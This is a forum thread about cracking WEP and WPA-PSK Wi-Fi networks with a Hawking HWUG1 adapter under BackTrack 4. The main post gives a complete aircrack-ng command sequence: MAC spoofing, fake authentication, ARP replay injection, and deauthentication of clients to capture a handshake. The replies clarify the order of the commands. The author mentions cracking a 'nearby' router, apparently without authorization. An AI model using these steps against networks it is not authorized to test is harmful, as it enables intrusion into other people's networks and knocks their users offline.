Results 1 to 3 of 3

Thread: Hawking HWUG1 + External SMA Jack [WEP WORKS]

  1. #1
    Just burned his ISO
    Join Date
    May 2009
    Posts
    3

    Default Hawking HWUG1 + External SMA Jack [Cracking WEP/WPA WORKS]

    Hi, first post here! Just wanted to confirm that the Hawking HWUG1 works perfectly for WEP cracking in BT4 Beta running through VMWare on a Windows 7 64-bit system. Cracked a WRT54GL and a 2WIRE using WEP encryption. Purchased it from Amazon brand new for $31 with free 2-day shipping. Would highly recommend the HWUG1 to anybody looking for a great card with an SMA jack, not to mention in comes with a decent dipole antenna.
    NOTE: WPA stuff at the bottom

    ====================== WEP =====================
    ====================== WEP =====================

    The reason I'm posting this is that it is slightly different then BT3 which required the following command to work properly:
    Code:
    iwconfig rausb0 rate 1M
    This command is no longer needed (unless the router is in a different mode, but through my test I never used this and it worked great on both routers one in 11b mode and the other in 54g mode). Also, I notice the device is named "rausb0", but in BT4b it's the generic "wlan0" I see in most tutorials; hence newbies have one less problem to worry about. Actually after researching the card I tried to use rausb0 in BT4b and it wasn't working so I tried wlan0 and it worked. Also I was pulling my hair out because I could not understand why it wasn't working until I tried it without that command and it worked!

    Here are the exact commands I used:
    Code:
    airmon-ng stop wlan0
    ifconfig wlan0 down
    macchanger --mac 00:11:22:33:44:55 wlan0
    airmon-ng start wlan0
    airodump-ng wlan0
    airodump-ng -c (channel) -w (filename) --bssid (BSSID) wlan0
    No need to explain whats going on here, it's the same as any tutorial out there. So the data starts to rise slowly, in order to provoke it I had to research a bit since nearly all guides used the -3 attack alone which does not work well (at least for the 2 routers i tired). I kept getting a deauth/disassoc packet which stopped me from collecting data quickly, maybe it was the routers but what I did worked and so that's what I'm gonna go by.

    Opened up a new tab and did the following:
    Code:
    aireplay-ng -1 6000 -0 1 -q 10 -e (ESSID) -a (BSSID) -h 00:11:22:33:44:55 wlan0
    Okay, this command here will constantly keep us authenticated/associated for 6000 seconds (every 10 seconds), with this we don't have to worry about the deauth/disassoc packets.

    Now I opened up a 3rd tab and did the following:
    Code:
    aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 wlan0
    Now go back to the 1st tab and watch the data rise quickly. I hit 60k in about 2 minutes. Then I cracked the file with success!

    As you can see the biggest problem was the deauth/disassoc packets that I kept receiving which made provoking the data impossible. Maybe it was the router, maybe it was the device, but I did this for both routers with success so anyone using the HWUG1 should try this out if they are having trouble in BT4b.
    BTW, I'm currently working on WPA-PSK cracking but I've run into some problems, will probably post about it later if I run outa ideas.

    Happy cracking!

    ===================== WPA =====================
    ===================== WPA =====================


    Just successfully cracked a WPA TKIP PSK router nearby... So I'm adding it here instead of making a new thread.
    Anyways here are the commands:
    Code:
    airmon-ng stop wlan0
    ifconfig wlan0 down
    macchanger --mac 00:11:22:33:44:55 wlan0
    airmon-ng start wlan0
    airodump-ng wlan0
    airodump-ng -c (channel) -w (filename) --bssid (BSSID) wlan0
    Samoe old, same old...

    Open up a new tab and do the following:
    Code:
    aireplay-ng -0 2 -a (BSSID) -c (client BSSID) wlan0
    also try this one in case you have trouble (actually I caught the handshake on this one but it was probably a fluke or maybe I was impatient):
    Code:
    aireplay-ng -0 5 -a (BSSID) wlan0
    Once you catch the handshake just crack it and your good to go!

  2. #2
    Just burned his ISO
    Join Date
    Jul 2006
    Posts
    18

    Default

    I follow you up to here, in the command below aircrack gives an error because it cannot process two attack modes which one did you use first
    -1 or -0.

    Opened up a new tab and did the following:
    Code:
    aireplay-ng -1 6000 -0 1 -q 10 -e (ESSID) -a (BSSID) -h 00:11:22:33:44:55 wlan0
    Okay, this command here will constantly keep us authenticated/associated for 6000 seconds (every 10 seconds), with this we don't have to worry about the deauth/disassoc packets.

    everything else works fine

  3. #3
    Just burned his ISO
    Join Date
    May 2009
    Posts
    3

    Default

    Quote Originally Posted by barecool View Post
    I follow you up to here, in the command below aircrack gives an error because it cannot process two attack modes which one did you use first
    -1 or -0.

    Opened up a new tab and did the following:
    Code:
    aireplay-ng -1 6000 -0 1 -q 10 -e (ESSID) -a (BSSID) -h 00:11:22:33:44:55 wlan0
    Okay, this command here will constantly keep us authenticated/associated for 6000 seconds (every 10 seconds), with this we don't have to worry about the deauth/disassoc packets.

    everything else works fine
    Hi, I never used a -0 attack in WEP cracking. Also I did the attacks in this order:
    Opened up a new tab and did the following:
    1.
    Code:
    aireplay-ng -1 6000 -0 1 -q 10 -e (ESSID) -a (BSSID) -h 00:11:22:33:44:55 wlan0
    then open a new tab or window:
    2.
    Code:
    aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 wlan0
    And I could do the attacks simultaneously (-1 and -3 attacks not -0).

    I will try to upload screenshots, give me a moment

    edit: sorry I just noticed you must have confused WPA commands with WEP commands. You are cracking WEP from what I understand correct? You can ignore anything after the WPA line since that's for WPA only. Sorry I just edited my post to make it clear. If you are cracking WPA then just use the commands below the WPA line.

    edit2: pics ( i still cant put URLs so add an 'h' before the link it will work)
    ttp://img38.imageshack.us/img38/7526/screenshot1i.png
    ttp://img297.imageshack.us/img297/9396/screenshot2k.png
    ttp://img14.imageshack.us/img14/3466/screenshot3fbw.png
    ttp://img529.imageshack.us/img529/4576/screenshot4g.png
    ttp://img193.imageshack.us/img193/8513/screenshot5q.png

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •